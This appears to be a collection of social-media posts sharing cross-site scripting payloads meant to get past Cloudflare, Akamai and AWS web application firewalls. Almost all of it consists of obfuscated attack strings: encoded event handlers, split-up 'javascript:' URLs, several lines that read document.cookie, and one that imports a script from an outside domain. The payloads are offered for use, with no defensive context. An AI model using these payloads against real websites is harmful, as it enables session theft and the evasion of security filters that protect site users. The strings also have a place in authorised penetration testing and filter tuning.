XSS WAF Bypass using location concatenation
Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
#Xss #WAF #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
payloads to bypass CloudFlare WAF
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<--<img/src=%20onerror=confirm``>%20--!>
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<sVg/onLy=1 onLoaD=confirm(1)//
#waf #bypass
——————
An Akamai WAF bypass
kuromatae"><textarea/onbeforeinput=kuro='//domain.tld';import(kuro)%09autofocus%09x>
#Bypass #WAF
——————
A payload to bypass some WAF
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
#Bypass #WAF
——————
Xss Bypass Waf
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
#bypass #waf
——————
CloudFlare WAF bypass payload
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
#WAF #bypass
——————
An Akamai WAF bypass payload
%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22
#Waf #bypass
——————
An Akamai WAF bypass payload
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
#WAF #Bypass
——————
A payload to bypass WAF
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
#WAF #Bypass
——————
Cloudflare WAF Bypass ⚡️
<a"/onclick=(confirm)(origin)>Click Here!
#Xss #waf #Bypass
——————
Fuzzing and Bypassing the AWS WAF
Github
Read Here
#WAF #Bypass
——————
Bypass Cloudflare WAF (XSS without parentheses) inside an anchor tag
javascript:var{a:onerror}={a:alert};throw%20document.domain
#xss #Bypass #WAF
——————
Cloudflare WAF Bypass Leads to Reflected XSS ®️
Payload Used:
"><img src=x onerror=alert(1)>
[Blocked By Cloudflare]
Payload Used:
"><img src=x onerrora=confirm() onerror=confirm(1)>
[XSS Popup]
#WAF #Bypass #XSS
——————
Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
click and write here!
#WAF #Bypass
——————
bypass XSS Cloudflare WAF
Encoded Payload:
"><track/onerror='confirm\%601\%60'>
Clean Payload:
"><track/onerror='confirm`1`'>
HTML entity & URL encoding:
" --> "
> --> >
< --> <
' --> '
` --> \%60
#Bypass #XSS #WAF
——————
Stored Xss payload 🔥
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
Xss Payload
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF